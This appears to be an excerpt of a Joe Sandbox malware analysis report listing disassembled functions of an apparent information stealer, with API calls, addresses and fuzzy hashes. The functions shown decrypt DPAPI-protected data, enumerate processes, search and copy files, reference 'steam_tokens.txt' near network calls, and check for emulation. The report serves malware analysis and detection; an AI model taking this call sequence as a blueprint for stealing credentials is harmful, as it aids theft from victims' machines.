Opcode Fuzzy Hash: b817c881d99d51f5a8c671ca54a45bf4726cdfd2472ed4ed8427f5b6838a8b43
Instruction Fuzzy Hash: 9372B076D10118AACB15FB91EC91EDEB73DAF14308F51439FB01662491EF346B89CBA8

Uniqueness

Uniqueness Score: -1.00%

Function 00411350 Relevance: 6.1, APIs: 4, Instructions: 100stringCOMMON

Download Yara Rule

APIs

strtok_s.MSVCRT ref: 00411378

Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88

strtok_s.MSVCRT ref: 0041146F

Part of subcall function 00416E20: lstrlen.KERNEL32(00000000,?,?,00412BE0,0041D59B,0041D59A,?,?,004137D6,00000000,?,02F519B8,?,0041D8AC,?,00000000), ref: 00416E2B
Part of subcall function 00416E20: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416E85

Memory Dump Source

Source File: 00000001.00000002.2071997124.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2071997124.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2071997124.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2071997124.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2071997124.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u5g0.jbxd

Yara matches

Similarity

API ID: lstrcpystrtok_s$lstrlen
String ID:
API String ID: 3184129880-0
Opcode ID: 56001c30c53b4d17a586dd012fffc626f69502a19238ae5f232f9200b11dcff1
Instruction ID: bc44fb65e395c18893d79e2daadfc8d7f4384440e0cba23ba4018ddaa6f79c9f
Opcode Fuzzy Hash: 56001c30c53b4d17a586dd012fffc626f69502a19238ae5f232f9200b11dcff1
Instruction Fuzzy Hash: 04417175D00208DBCB04EFE5D855AEEBB75BF48304F00811EE51177290EB38AA85CFA9

Uniqueness

Uniqueness Score: -1.00%

Function 004096C0 Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 98COMMON

Download Yara Rule

APIs

Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88

Part of subcall function 004093A0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004093CC
Part of subcall function 004093A0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 004093F1
Part of subcall function 004093A0: LocalAlloc.KERNEL32(00000040,?), ref: 00409411
Part of subcall function 004093A0: ReadFile.KERNEL32(000000FF,?,00000000,'@,00000000), ref: 0040943A
Part of subcall function 004093A0: LocalFree.KERNEL32('@), ref: 00409470
Part of subcall function 004093A0: FindCloseChangeNotification.KERNEL32(000000FF), ref: 0040947A

Part of subcall function 00415530: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00415552

StrStrA.SHLWAPI(00000000,02F54FA8), ref: 0040971B

Part of subcall function 004094A0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00404BAE,00000000,00000000), ref: 004094CF
Part of subcall function 004094A0: LocalAlloc.KERNEL32(00000040,?,?,?,00404BAE,00000000,?), ref: 004094E1
Part of subcall function 004094A0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00404BAE,00000000,00000000), ref: 0040950A
Part of subcall function 004094A0: LocalFree.KERNEL32(?,?,?,?,00404BAE,00000000,?), ref: 0040951F

memcmp.MSVCRT ref: 00409774

Part of subcall function 00409540: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00409564
Part of subcall function 00409540: LocalAlloc.KERNEL32(00000040,00000000), ref: 00409583
Part of subcall function 00409540: LocalFree.KERNEL32(?), ref: 004095AF

Strings

DPAPI, xrefs: 0040976B
, xrefs: 004097A3

Memory Dump Source

Source File: 00000001.00000002.2071997124.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2071997124.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2071997124.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2071997124.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2071997124.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u5g0.jbxd

Yara matches

Similarity

API ID: Local$Alloc$CryptFileFree$BinaryString$ChangeCloseCreateDataFindNotificationReadSizeUnprotectlstrcpymemcmp
String ID: $DPAPI
API String ID: 2647593125-1819349886
Opcode ID: 0f5c4bf38f16a5dc7c6c7dc1d4b3af3428d24ec323dc2f9b096cad114df4e3c7
Instruction ID: 25d6f3248392bfa9bca68fd769027b68fff5740b7e0b7820d89104a1b18a6e16
Opcode Fuzzy Hash: 0f5c4bf38f16a5dc7c6c7dc1d4b3af3428d24ec323dc2f9b096cad114df4e3c7
Instruction Fuzzy Hash: 493141B6D10108EBCF04DF94DC45AEFB7B9AF48704F14452DE905B3292E7389A44CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 00414DE0 Relevance: 6.1, APIs: 4, Instructions: 60processCOMMON

Download Yara Rule

APIs

Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00414E07
Process32First.KERNEL32(00000000,00000128), ref: 00414E1B
Process32Next.KERNEL32(00000000,00000128), ref: 00414E30

Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012

Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05

FindCloseChangeNotification.KERNEL32(00000000), ref: 00414E9E

Memory Dump Source

Source File: 00000001.00000002.2071997124.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2071997124.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2071997124.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2071997124.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2071997124.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u5g0.jbxd

Yara matches

Similarity

API ID: lstrcpy$Process32$ChangeCloseCreateFindFirstNextNotificationSnapshotToolhelp32lstrcatlstrlen
String ID:
API String ID: 3491751439-0
Opcode ID: 46479fa1dff31d1553307a673ed5531c210884f90894ffa9fa2d91d76bee7172
Instruction ID: b51d58226d22fc07b4aaea4bdcaba1b12d12dab42e387443cd86e66b2ce9f1c4
Opcode Fuzzy Hash: 46479fa1dff31d1553307a673ed5531c210884f90894ffa9fa2d91d76bee7172
Instruction Fuzzy Hash: ED211D759002189BCB24EB61DC95FDEB779AF54304F1041DAA50A66190DF38AFC5CF94

Uniqueness

Uniqueness Score: -1.00%

Function 004159E0 Relevance: 6.0, APIs: 4, Instructions: 39fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32(00411879,80000000,00000003,00000000,00000003,00000080,00000000,?,00411879,?), ref: 004159FC
GetFileSizeEx.KERNEL32(000000FF,00411879), ref: 00415A19
CloseHandle.KERNEL32(000000FF), ref: 00415A27

Memory Dump Source

Source File: 00000001.00000002.2071997124.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2071997124.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2071997124.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2071997124.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2071997124.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u5g0.jbxd

Yara matches

Similarity

API ID: File$CloseCreateHandleSize
String ID:
API String ID: 1378416451-0
Opcode ID: f3a5877fc348a9a64368c001e27037213673241a1fda354ede690d4ee948c5a4
Instruction ID: adbcd47bb22ca6d6b42933acd4cabc8e10c5a14c322029dfd4b487fe3fd33794
Opcode Fuzzy Hash: f3a5877fc348a9a64368c001e27037213673241a1fda354ede690d4ee948c5a4
Instruction Fuzzy Hash: C9F03139F44604FBDB20DBF0DC85BDE7779BF44710F118255B951A7280DA7496428B44

Uniqueness

Uniqueness Score: -1.00%

Function 004137B3 Relevance: 6.0, APIs: 4, Instructions: 30sleepCOMMON

Download Yara Rule

APIs

OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,02F519B8,?,0041D8AC,?,00000000,?,0041D8B0,?,00000000,0041D6E3), ref: 0041378A
CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 004137A8
CloseHandle.KERNEL32(00000000), ref: 004137B9
Sleep.KERNEL32(00001770), ref: 004137C4
CloseHandle.KERNEL32(?,00000000,?,02F519B8,?,0041D8AC,?,00000000,?,0041D8B0,?,00000000,0041D6E3), ref: 004137DA
ExitProcess.KERNEL32 ref: 004137E2

Memory Dump Source

Source File: 00000001.00000002.2071997124.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2071997124.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2071997124.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2071997124.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2071997124.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u5g0.jbxd

Yara matches

Similarity

API ID: CloseEventHandle$CreateExitOpenProcessSleep
String ID:
API String ID: 941982115-0
Opcode ID: 8c395499d79107547ad2670ad1a9bedab58bcd276438d400b3f2e9037467bb4f
Instruction ID: 00ad45554361a1bf9ffb836df5d455c5d00fe00f471bf70531fad30136aebd8c
Opcode Fuzzy Hash: 8c395499d79107547ad2670ad1a9bedab58bcd276438d400b3f2e9037467bb4f
Instruction Fuzzy Hash: 5FF054B0944206AAE720AFA1DD05BFE7675BB08B46F10851AF612951C0DBB856818A5D

Uniqueness

Uniqueness Score: -1.00%

Function 00406730 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 157COMMON

Download Yara Rule

Strings

Pi@, xrefs: 004067C2, 0040679E, 0040689F, 00406884, 0040684E

Memory Dump Source

Source File: 00000001.00000002.2071997124.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2071997124.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2071997124.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2071997124.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2071997124.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u5g0.jbxd

Yara matches

Similarity

API ID:
String ID: Pi@
API String ID: 0-1360946908
Opcode ID: 8cfa37973c56b3597612bf0eabde1d0c10c792fef38bbd1cab651f123bbbde38
Instruction ID: 3e1b1374d11ee30af11b8018be346ecc1401931fa3badc01db0dac5c56ce0c6a
Opcode Fuzzy Hash: 8cfa37973c56b3597612bf0eabde1d0c10c792fef38bbd1cab651f123bbbde38
Instruction Fuzzy Hash: 756105B5D00208DBDB14DF94D984BEEB7B0AB48304F1185AAE80677380D739AEA5DF95

Uniqueness

Uniqueness Score: -1.00%

Function 00404470 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 60stringnetworkCOMMON

Download Yara Rule

APIs

Part of subcall function 00414FF0: malloc.MSVCRT ref: 00414FF8

lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 004044F6
InternetCrackUrlA.WININET(00000000,00000000), ref: 00404506

Strings

<, xrefs: 00404489

Memory Dump Source

Source File: 00000001.00000002.2071997124.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2071997124.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2071997124.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2071997124.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2071997124.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u5g0.jbxd

Yara matches

Similarity

API ID: CrackInternetlstrlenmalloc
String ID: <
API String ID: 3848002758-4251816714
Opcode ID: aeef5f2ed02e6a3999d7780715e9b01c82d95ed690bba4fbfbc10c77722f063a
Instruction ID: 4ed07355fbd84ea2b0e25782c0c6f45789bb77a73037a8222357df496ca5bcbd
Opcode Fuzzy Hash: aeef5f2ed02e6a3999d7780715e9b01c82d95ed690bba4fbfbc10c77722f063a
Instruction Fuzzy Hash: 52216DB1D00208ABDF10EFA5E845BDD7B74AB44324F008229FA25B72C0EB346A46CB95

Uniqueness

Uniqueness Score: -1.00%

Function 0040EF80 Relevance: 4.7, APIs: 3, Instructions: 197COMMON

Download Yara Rule

APIs

StrCmpCA.SHLWAPI(00000000,02F517E8), ref: 0040EFCE
StrCmpCA.SHLWAPI(00000000,02F51788), ref: 0040F06F
StrCmpCA.SHLWAPI(00000000,02F51898), ref: 0040F17E

Part of subcall function 00416DA0: lstrcpy.KERNEL32(?,00000000), ref: 00416DE6

Memory Dump Source

Source File: 00000001.00000002.2071997124.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2071997124.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2071997124.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2071997124.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2071997124.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u5g0.jbxd

Yara matches

Similarity

API ID: lstrcpy
String ID:
API String ID: 3722407311-0
Opcode ID: 17ee8d4bb47bc937838a921e65ccc51b748575e53c3b1e70dc14177f4da96910
Instruction ID: 4355cab003f180362ea4467312be264c8b2230b95154913c46dc9b5fce20c885
Opcode Fuzzy Hash: 17ee8d4bb47bc937838a921e65ccc51b748575e53c3b1e70dc14177f4da96910
Instruction Fuzzy Hash: 8D719871B002099BCF08FF75D9929EEB77AAF94304B10852EF4099B285EA34DE45CBC5

Uniqueness

Uniqueness Score: -1.00%

Function 0040EF9F Relevance: 4.7, APIs: 3, Instructions: 177COMMON

Download Yara Rule

APIs

StrCmpCA.SHLWAPI(00000000,02F517E8), ref: 0040EFCE
StrCmpCA.SHLWAPI(00000000,02F51788), ref: 0040F06F
StrCmpCA.SHLWAPI(00000000,02F51898), ref: 0040F17E

Part of subcall function 00416DA0: lstrcpy.KERNEL32(?,00000000), ref: 00416DE6

Memory Dump Source

Source File: 00000001.00000002.2071997124.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2071997124.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2071997124.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2071997124.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2071997124.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u5g0.jbxd

Yara matches

Similarity

API ID: lstrcpy
String ID:
API String ID: 3722407311-0
Opcode ID: c0e8afd2b328ff63d8d14583a7f3cac733c21cd6f5f9b0d5442cba21dfb69c98
Instruction ID: f0c51ec5e8e6f52f2f367cc82315d09f99f950b48122d5325302ee48485a66a2
Opcode Fuzzy Hash: c0e8afd2b328ff63d8d14583a7f3cac733c21cd6f5f9b0d5442cba21dfb69c98
Instruction Fuzzy Hash: 03618A71B002099FCF08EF75D9929EEB77AAF94304B10852EF4099B295DA34EE45CBC4

Uniqueness

Uniqueness Score: -1.00%

Function 004127E0 Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 118stringCOMMON

Download Yara Rule

APIs

Part of subcall function 004154E0: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 0041550B

lstrcat.KERNEL32(?,00000000), ref: 0041281A
lstrcat.KERNEL32(?,02F55988), ref: 00412838

Part of subcall function 00412570: wsprintfA.USER32 ref: 00412589
Part of subcall function 00412570: FindFirstFileA.KERNEL32(?,?), ref: 004125A0

Part of subcall function 00412570: StrCmpCA.SHLWAPI(?,0041D864), ref: 004125CE
Part of subcall function 00412570: StrCmpCA.SHLWAPI(?,0041D868), ref: 004125E4
Part of subcall function 00412570: FindNextFileA.KERNEL32(000000FF,?), ref: 004127B9
Part of subcall function 00412570: FindClose.KERNEL32(000000FF), ref: 004127CE

Part of subcall function 00412570: wsprintfA.USER32 ref: 0041260A
Part of subcall function 00412570: StrCmpCA.SHLWAPI(?,0041D4B2), ref: 0041261C
Part of subcall function 00412570: wsprintfA.USER32 ref: 00412639
Part of subcall function 00412570: PathMatchSpecA.SHLWAPI(?,?), ref: 0041266F
Part of subcall function 00412570: lstrcat.KERNEL32(?,02F51728), ref: 0041269B
Part of subcall function 00412570: lstrcat.KERNEL32(?,0041D880), ref: 004126AD
Part of subcall function 00412570: lstrcat.KERNEL32(?,?), ref: 004126BE
Part of subcall function 00412570: lstrcat.KERNEL32(?,0041D884), ref: 004126D0
Part of subcall function 00412570: lstrcat.KERNEL32(?,?), ref: 004126E4
Part of subcall function 00412570: CopyFileA.KERNEL32(?,?,00000001), ref: 004126FA
Part of subcall function 00412570: DeleteFileA.KERNEL32(?), ref: 00412779

Part of subcall function 00412570: wsprintfA.USER32 ref: 0041265B

Strings

00A, xrefs: 0041285C, 0041288B, 004128BB, 004128EA, 0041291A, 00412949, 0041296B, 0041285F, 0041288E, 004128BE, 004128ED, 0041291D, 0041294C

Memory Dump Source

Source File: 00000001.00000002.2071997124.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2071997124.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2071997124.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2071997124.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2071997124.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u5g0.jbxd

Yara matches

Similarity

API ID: lstrcat$Filewsprintf$Find$Path$CloseCopyDeleteFirstFolderMatchNextSpec
String ID: 00A
API String ID: 2104210347-95910775
Opcode ID: 22c5818045d8b03e6d02fb02e48f9119a1aea3b00f0590396d798a24216a6a8b
Instruction ID: 9a839e9be304faf39bc4facc08b08f26c4420ed68fa3aa933a56f5c5bfc0aac5
Opcode Fuzzy Hash: 22c5818045d8b03e6d02fb02e48f9119a1aea3b00f0590396d798a24216a6a8b
Instruction Fuzzy Hash: 6441ABB7A001047BCB24FBE0DC92EEA377E9B94705F00424DB55987191ED74A7D48BD9

Uniqueness

Uniqueness Score: -1.00%

Function 00415B70 Relevance: 4.5, APIs: 3, Instructions: 29COMMON

Download Yara Rule

APIs

OpenProcess.KERNEL32(00000410,00000000,?), ref: 00415B84
K32GetModuleFileNameExA.KERNEL32(00000000,00000000,?,00000104), ref: 00415BA5
CloseHandle.KERNEL32(00000000), ref: 00415BAF

Memory Dump Source

Source File: 00000001.00000002.2071997124.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2071997124.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2071997124.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2071997124.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2071997124.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u5g0.jbxd

Yara matches

Similarity

API ID: CloseFileHandleModuleNameOpenProcess
String ID:
API String ID: 3183270410-0
Opcode ID: 97fc9d568dab5260ce1fa1a51ba1ebaf2853d767a04b83f08cd6b5726440208b
Instruction ID: b12b055c0fde6327b7bfc42128d307bcca402a5100f46dd347d8d84938e244fe
Opcode Fuzzy Hash: 97fc9d568dab5260ce1fa1a51ba1ebaf2853d767a04b83f08cd6b5726440208b
Instruction Fuzzy Hash: C5F05475A0010CFBDB14DFA4DC4AFED7778BB08300F004499BA0597280D6B06E85CB94

Uniqueness

Uniqueness Score: -1.00%

Function 00414400 Relevance: 4.5, APIs: 3, Instructions: 23memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,004136EB,0041D6E3), ref: 0041440D
HeapAlloc.KERNEL32(00000000), ref: 00414414
GetComputerNameA.KERNEL32(?,00000104), ref: 0041442C

Memory Dump Source

Source File: 00000001.00000002.2071997124.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2071997124.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2071997124.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2071997124.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2071997124.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u5g0.jbxd

Yara matches

Similarity

API ID: Heap$AllocComputerNameProcess
String ID:
API String ID: 4203777966-0
Opcode ID: 6e220fa814439a9a47cb0e7b1b891ce31241d7c627682025937d03601ca1af04
Instruction ID: 2ac30a00ccf60c4f43266989ac8565747831d88261cb92d9c694311de33eed43
Opcode Fuzzy Hash: 6e220fa814439a9a47cb0e7b1b891ce31241d7c627682025937d03601ca1af04
Instruction Fuzzy Hash: F1E0D8B0A00608FBCB20DFE4DD48BDD77BCAB04305F100055FA05D3240D7749A458B96

Uniqueness

Uniqueness Score: -1.00%

Function 004010D0 Relevance: 4.5, APIs: 3, Instructions: 21memoryCOMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000,?,?,004136DC), ref: 004010EB
VirtualAllocExNuma.KERNEL32(00000000,?,?,004136DC), ref: 004010F2
ExitProcess.KERNEL32 ref: 00401103

Memory Dump Source

Source File: 00000001.00000002.2071997124.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2071997124.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2071997124.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2071997124.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2071997124.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u5g0.jbxd

Yara matches

Similarity

API ID: Process$AllocCurrentExitNumaVirtual
String ID:
API String ID: 1103761159-0
Opcode ID: b1c8d233814077f36e701fc9dcba40fcf29c53b912e4e1fc8df77dce1fb5e496
Instruction ID: b86936f0f7b92ad6105a5e8d9325c57b614f4cde8fc05540e07f2d0ff83aec39
Opcode Fuzzy Hash: b1c8d233814077f36e701fc9dcba40fcf29c53b912e4e1fc8df77dce1fb5e496
Instruction Fuzzy Hash: 1BE0867098570CBBE7309BA0DD0AB1976689B08B06F101055F7097A1D0C6B425008699

Uniqueness

Uniqueness Score: -1.00%

Function 004119B0 Relevance: 3.1, APIs: 2, Instructions: 66stringCOMMON

Download Yara Rule

APIs

strtok_s.MSVCRT ref: 004119C8

Part of subcall function 00411650: wsprintfA.USER32 ref: 00411669
Part of subcall function 00411650: FindFirstFileA.KERNEL32(?,?), ref: 00411680

strtok_s.MSVCRT ref: 00411A4D

Memory Dump Source

Source File: 00000001.00000002.2071997124.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2071997124.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2071997124.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2071997124.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2071997124.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u5g0.jbxd

Yara matches

Similarity

API ID: strtok_s$FileFindFirstwsprintf
String ID:
API String ID: 3409980764-0
Opcode ID: 56c56d0ac979ecf528fa834ab5668d8e9f1c3a748c19addad7c8f0e0189fc1c2
Instruction ID: 5fc3070f54b5ba386e916c7c3ae22cc6ad81f817c7a7f871d2ab45b9afc63085
Opcode Fuzzy Hash: 56c56d0ac979ecf528fa834ab5668d8e9f1c3a748c19addad7c8f0e0189fc1c2
Instruction Fuzzy Hash: 19215471900108EBCB14FFA5CC55FED7B79AF44345F10805AF51A97151EB386B84CB99

Uniqueness

Uniqueness Score: -1.00%

Function 00412B30 Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 40stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88

Part of subcall function 00416E20: lstrlen.KERNEL32(00000000,?,?,00412BE0,0041D59B,0041D59A,?,?,004137D6,00000000,?,02F519B8,?,0041D8AC,?,00000000), ref: 00416E2B
Part of subcall function 00416E20: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416E85

lstrlen.KERNEL32(00000000,00000000,0041D599,?,?,?,?,?,?,00412FF8,?), ref: 00412B5A

Part of subcall function 00404DC0: lstrlen.KERNEL32(00000000), ref: 00404E4A
Part of subcall function 00404DC0: InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00404EBB
Part of subcall function 00404DC0: StrCmpCA.SHLWAPI(?,02F516B8), ref: 00404ED9

Strings

steam_tokens.txt, xrefs: 00412B6F

Memory Dump Source

Source File: 00000001.00000002.2071997124.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2071997124.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2071997124.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2071997124.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2071997124.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u5g0.jbxd

Yara matches

Similarity

API ID: lstrlen$lstrcpy$InternetOpen
String ID: steam_tokens.txt
API String ID: 2934705399-401951677
Opcode ID: 19bc68a38d16d371974febdd1ebbd2f3a4d1e3c4d40b5fbbb5012b4e6c226ecc
Instruction ID: 10dd2298c38adeb5e36390c5bfe4eda46295fd03d88468a146a299c80adb3810
Opcode Fuzzy Hash: 19bc68a38d16d371974febdd1ebbd2f3a4d1e3c4d40b5fbbb5012b4e6c226ecc
Instruction Fuzzy Hash: 18F08175D1020866CB18FBB2EC539ED773D9E54348B00425EF81662491EF38A788C6E9

Uniqueness

Uniqueness Score: -1.00%

Function 004147C0 Relevance: 3.0, APIs: 2, Instructions: 17COMMON

Download Yara Rule

APIs

GetSystemInfo.KERNEL32(00000000), ref: 004147CD
wsprintfA.USER32 ref: 004147E3

Memory Dump Source

Source File: 00000001.00000002.2071997124.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2071997124.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2071997124.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2071997124.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2071997124.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u5g0.jbxd

Yara matches

Similarity

API ID: InfoSystemwsprintf
String ID:
API String ID: 2452939696-0
Opcode ID: ae5762f0629c30c52eb39fe9d29b6f6254fbc8fd6ef0ba27fd947bac7523c98c
Instruction ID: d87a4f6b3ea3f44bdf221dc5e2fa01f01132d118a4d77551e5f155a4815ada85
Opcode Fuzzy Hash: ae5762f0629c30c52eb39fe9d29b6f6254fbc8fd6ef0ba27fd947bac7523c98c
